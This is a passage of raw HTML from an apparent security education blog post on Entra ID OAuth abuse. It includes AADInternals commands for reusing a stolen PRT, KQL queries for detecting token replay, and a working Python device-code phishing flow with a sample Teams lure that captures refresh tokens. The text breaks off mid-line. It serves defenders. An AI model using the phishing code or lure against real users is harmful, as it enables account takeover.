style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Use PRT to generate a new access token for any resource</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$token = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prt</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># From here, the attacker can access any Microsoft resource</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># the user is authorized for  SharePoint, Exchange, Teams, Azure</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-to-look-for-in-logs\">What to Look For in Logs<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#what-to-look-for-in-logs\" class=\"hash-link\" aria-label=\"Direct link to What to Look For in Logs\" title=\"Direct link to What to Look For in Logs\" translate=\"no\">​</a></h3>\n<p>When token theft is occurring, the legitimate user's sign-in logs will show successful authentication from their normal location, while the attacker's usage will appear as API calls or browser sessions from unusual IPs  but importantly, they will show as successful with no failed authentications.</p>\n<p>Key signals in Entra ID Sign-in Logs (<code>AADNonInteractiveUserSignInLogs</code>):</p>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Detect token replay from anomalous IP</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AADNonInteractiveUserSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where ResultType == 0  // successful</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| summarize </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    IPs = make_set(IPAddress),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Locations = make_set(Location),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    FirstSeen = min(TimeGenerated),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    LastSeen = max(TimeGenerated)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    by UserPrincipalName, CorrelationId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where array_length(IPs) &gt; 2</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where array_length(Locations) &gt; 1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project UserPrincipalName, IPs, Locations, FirstSeen, LastSeen</span><br></span></code></pre></div></div>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Impossible travel detection (token used from two geographies within 1 hour)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AADNonInteractiveUserSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where ResultType == 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, UserPrincipalName, IPAddress, Location</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by UserPrincipalName, TimeGenerated asc</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend PrevTime = prev(TimeGenerated), PrevLocation = prev(Location), PrevUser = prev(UserPrincipalName)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where UserPrincipalName == PrevUser</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend MinutesDelta = datetime_diff('minute', TimeGenerated, PrevTime)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where MinutesDelta &lt; 60 and Location != PrevLocation</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-2-device-code-phishing--the-attack-that-bypasses-every-mfa-control\">Section 2: Device Code Phishing  The Attack That Bypasses Every MFA Control<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#section-2-device-code-phishing--the-attack-that-bypasses-every-mfa-control\" class=\"hash-link\" aria-label=\"Direct link to Section 2: Device Code Phishing  The Attack That Bypasses Every MFA Control\" title=\"Direct link to Section 2: Device Code Phishing  The Attack That Bypasses Every MFA Control\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-this-attack-is-devastatingly-effective\">Why This Attack Is Devastatingly Effective<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#why-this-attack-is-devastatingly-effective\" class=\"hash-link\" aria-label=\"Direct link to Why This Attack Is Devastatingly Effective\" title=\"Direct link to Why This Attack Is Devastatingly Effective\" translate=\"no\">​</a></h3>\n<p>Device code phishing is arguably the most dangerous technique in this category because it:</p>\n<ul>\n<li class=\"\">Requires zero malware on the victim's machine</li>\n<li class=\"\">Completely bypasses MFA (the user completes it themselves)</li>\n<li class=\"\">Produces a fully legitimate refresh token indistinguishable from a normal login</li>\n<li class=\"\">Can be executed entirely through email or Teams messages</li>\n<li class=\"\">Works against even hardware token MFA (FIDO2 keys do <strong>NOT</strong> protect against this)</li>\n</ul>\n<p>Understanding why requires understanding the OAuth 2.0 Device Authorization Grant flow  which was designed for devices without browsers (smart TVs, IoT devices) and has been weaponized against enterprise users.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-legitimate-flow-so-you-understand-whats-being-abused\">The Legitimate Flow (So You Understand What's Being Abused)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#the-legitimate-flow-so-you-understand-whats-being-abused\" class=\"hash-link\" aria-label=\"Direct link to The Legitimate Flow (So You Understand What's Being Abused)\" title=\"Direct link to The Legitimate Flow (So You Understand What's Being Abused)\" translate=\"no\">​</a></h3>\n<p>The Device Authorization Grant (<code>urn:ietf:params:oauth:grant-type:device_code</code>) works like this:</p>\n<ol>\n<li class=\"\">A device that cannot show a browser calls the authorization endpoint and receives a <code>device_code</code> and a <code>user_code</code></li>\n<li class=\"\">The device displays: \"Go to microsoft.com/devicelogin and enter code: ABCD-EFGH\"</li>\n<li class=\"\">The user opens a browser, navigates to that URL, enters the code, and completes authentication including MFA</li>\n<li class=\"\">The device polls the token endpoint until it receives the access token and refresh token</li>\n</ol>\n<p>The design intention is that the device initiates the request, the user approves it elsewhere. The attack inverts this: the attacker initiates the request and tricks the user into approving it.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-attack-flow-step-by-step\">The Attack Flow, Step by Step<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#the-attack-flow-step-by-step\" class=\"hash-link\" aria-label=\"Direct link to The Attack Flow, Step by Step\" title=\"Direct link to The Attack Flow, Step by Step\" translate=\"no\">​</a></h3>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Step 1: Attacker initiates device code request</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># (this is a standard OAuth request  no exploit required)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> requests</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">tenant_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"common\"</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># or target tenant ID</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">client_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"d3590ed6-52b3-4102-aeff-aad2292ab01c\"</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Microsoft Office client ID (legitimate)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Request device code</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">response </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">post</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"https://login.microsoftonline.com/</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">tenant_id</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">/oauth2/v2.0/devicecode\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    data</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"client_id\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> client_id</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"scope\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"openid profile email offline_access https://graph.microsoft.com/.default\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">device_code_data </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> response</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">user_code </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> device_code_data</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"user_code\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">       </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># e.g., \"ABCD-EFGH\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">device_code </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> device_code_data</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"device_code\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">   </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># long opaque string</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">verification_uri </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> device_code_data</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"verification_uri\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># microsoft.com/devicelogin</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"Send victim to: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">verification_uri</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"Tell them to enter code: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">user_code</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Step 2: Attacker sends phishing message to victim</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Example Teams message (seen in real Midnight Blizzard campaigns):</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># \"Hi, IT Security here. We're rolling out a new MFA compliance check.</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#  Please go to microsoft.com/devicelogin and enter this code to verify</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#  your device: ABCD-EFGH</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#  This takes 2 minutes and must be completed by EOD.\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># The victim trusts this because:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># - The URL is a real Microsoft URL</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># - The flow looks exactly like legitimate device enrollment</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># - They've likely done this before for real IT requests</span><br></span></code></pre></div></div>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Step 3: Attacker polls for token while victim completes authentication</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> time</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">while</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">True</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    poll_response </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">post</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"https://login.microsoftonline.com/</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">tenant_id</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">/oauth2/v2.0/token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        data</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"client_id\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> client_id</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"grant_type\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"urn:ietf:params:oauth:grant-type:device_code\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"device_code\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> device_code</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    result </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> poll_response</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"access_token\"</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> result</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        access_token </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> result</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"access_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        refresh_token </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> result</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"refresh_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Valid for 90 days</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"SUCCESS  persistent access obtained\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"Refresh token: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">refresh_token</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token string-interpolation interpolation format-spec\">50]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">...\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">break</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">elif</span><span class=\"token plain\"> result</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"error\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span 